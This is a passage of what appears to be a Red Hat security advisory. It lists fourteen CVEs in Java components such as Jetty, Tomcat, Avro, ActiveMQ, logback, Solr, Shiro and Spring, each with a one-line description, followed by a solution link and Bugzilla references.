* jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* jetty-http: jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK (CVE-2023-39410)

* JSON-java: parser confusion leads to OOM (CVE-2023-5072)

* http2-hpack: jetty: hpack header values cause denial of service in http/2 (CVE-2023-36478)

* spring-boot: org.springframework.boot:spring-boot-actuator class vulnerable to denial of service (CVE-2023-34055)

* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)

* activemq: Apache ActiveMQ: Deserialization vulnerability on Jolokia that allows authenticated users to perform RCE (CVE-2022-41678)

* logback: serialization vulnerability in logback receiver (CVE-2023-6378)

* logback: A serialization vulnerability in logback receiver (CVE-2023-6481)

* solr: : Apache Solr: Host environment variables are published via the Metrics API (CVE-2023-50290)

* shiro: path traversal attack may lead to authentication bypass (CVE-2023-46749)

* tomcat: Leaking of unrelated request bodies in default error page (CVE-2024-21733)

* springframework: URL Parsing with Host Validation (CVE-2024-22243)

For more details about the security issues, including the impact, CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-41678

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2209689  
https://bugzilla.redhat.com/show_bug.cgi?id=2239630  
https://bugzilla.redhat.com/show_bug.cgi?id=2239634  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2243123  
https://bugzilla.redhat.com/show_bug.cgi?id=2246417  
https://bugzilla.redhat.com/show_bug.cgi?id=2251917  
https://bugzilla.redhat.com/show_bug.cgi?id=2252050  
https://bugzilla.redhat.com/show_bug.cgi?id=2252185  
https://bugzilla.redhat.com/show_bug.cgi?id=2252230  
https://bugzilla.redhat.com/show_bug.cgi?id=2252956  
https://bugzilla.redhat.com/show_bug.cgi?id=2258132  
https://bugzilla.redhat.com/show_bug.cgi?id=2258134  
https://bugzilla.redhat.com/show_bug.cgi?id=2259204  
https://bugzilla.redhat.com/show_bug.cgi?id=2265735

Tag

#auth